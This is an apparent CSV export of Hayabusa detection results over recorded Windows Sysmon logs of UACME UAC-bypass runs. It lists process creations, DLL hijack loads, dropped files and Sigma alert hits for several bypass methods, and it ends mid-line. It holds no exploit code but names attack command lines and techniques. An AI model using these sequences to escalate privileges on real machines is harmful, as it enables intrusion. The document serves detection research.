+2019-08-03 12:08:16.753 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471300 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:16.853 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:16.853 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6388 | PGUID: 747F3D96-7930-5D45-0000-001085EE0601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:19.888 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:19.915 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6000 | PGUID: 747F3D96-7933-5D45-0000-0010227E0701",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:20.731 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3b3 | PID: 4964 | PGUID: 747F3D96-7934-5D45-0000-0010A2A40701",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:21.128 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:21.954 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:21.954 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 7324 | PGUID: 747F3D96-7935-5D45-0000-001066CA0701,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:23.524 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:23.554 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 4192 | PGUID: 747F3D96-7937-5D45-0000-00100D290801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:23.555 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7564 | Src PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Tgt PID: 4192 | Tgt PGUID: 747F3D96-7937-5D45-0000-00100D290801,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:23.555 +00:00,MSEDGEWIN10,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:25.165 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:55.408 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3116 | PGUID: 747F3D96-7957-5D45-0000-00100E620A01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:31:14.789 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 37 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:14.789 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:14.789 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:15.096 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\GdiPlus.dll | Process: C:\Windows\explorer.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:15.354 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3fb | PID: 932 | PGUID: 747F3D96-7E93-5D45-0000-0010AA622601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:15.364 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3796 | PGUID: 747F3D96-7E93-5D45-0000-001008652601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:15.779 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3b3 | PID: 6576 | PGUID: 747F3D96-7E93-5D45-0000-0010AA8A2601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:15.779 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:27.049 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2352 | PGUID: 747F3D96-7E9E-5D45-0000-001080D92601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:27.683 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:32:34.577 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 36 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:34.577 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:34.577 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:34.875 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\MSCOREE.DLL | Process: C:\Windows\explorer.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:35.085 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 2740 | PGUID: 747F3D96-7EE2-5D45-0000-0010E49C2801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:35.137 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3652 | PGUID: 747F3D96-7EE2-5D45-0000-0010F19E2801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:35.531 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 2348 | PGUID: 747F3D96-7EE3-5D45-0000-0010AFC12801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:35.531 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:36.794 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 7180 | PGUID: 747F3D96-7EE4-5D45-0000-001015F72801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:36.812 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471E00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1708 | PGUID: 747F3D96-7EE4-5D45-0000-001029F92801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:37.160 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 1240 | PGUID: 747F3D96-7EE4-5D45-0000-001091122901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:37.184 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | LID: 0x18d3b3 | PID: 7636 | PGUID: 747F3D96-7EE5-5D45-0000-001076162901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:37.261 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 344 | PGUID: 747F3D96-7EE5-5D45-0000-0010B71B2901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:38.640 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:49.013 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 796 | PGUID: 747F3D96-7EF1-5D45-0000-0010DDBF2901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:49.525 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7400 | PGUID: 747F3D96-7E25-5D45-0000-0010D0AF2301,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 13:50:26.614 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 38 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:26.614 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:26.614 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:26.782 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:26.782 +00:00,MSEDGEWIN10,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:27.060 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 398 000002806443AF40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5128 | PGUID: 747F3D96-9122-5D45-0000-001042326101,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:27.356 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 38 | LID: 0x18d3b3 | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:29.101 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50105 (MSEDGEWIN10.home) | Dst: 185.199.111.153:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:29.424 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | LID: 0x18d3b3 | PID: 3180 | PGUID: 747F3D96-9124-5D45-0000-001022926101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:29.424 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:29.424 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:29.459 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | LID: 0x18d3b3 | PID: 6236 | PGUID: 747F3D96-9124-5D45-0000-00103B986101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:29.461 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\fubuki.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3180 | Src PGUID: 747F3D96-9124-5D45-0000-001022926101 | Tgt PID: 6236 | Tgt PGUID: 747F3D96-9124-5D45-0000-00103B986101,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 15:08:06.262 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 39 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:06.262 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:06.262 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:06.419 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\explorer.exe | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:06.419 +00:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/file_event_win_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:06.730 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3fb | PID: 1492 | PGUID: 747F3D96-A356-5D45-0000-0010C5C59901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:06.796 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 376 0000028064463A00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7840 | PGUID: 747F3D96-A356-5D45-0000-001006D49901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:07.144 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" 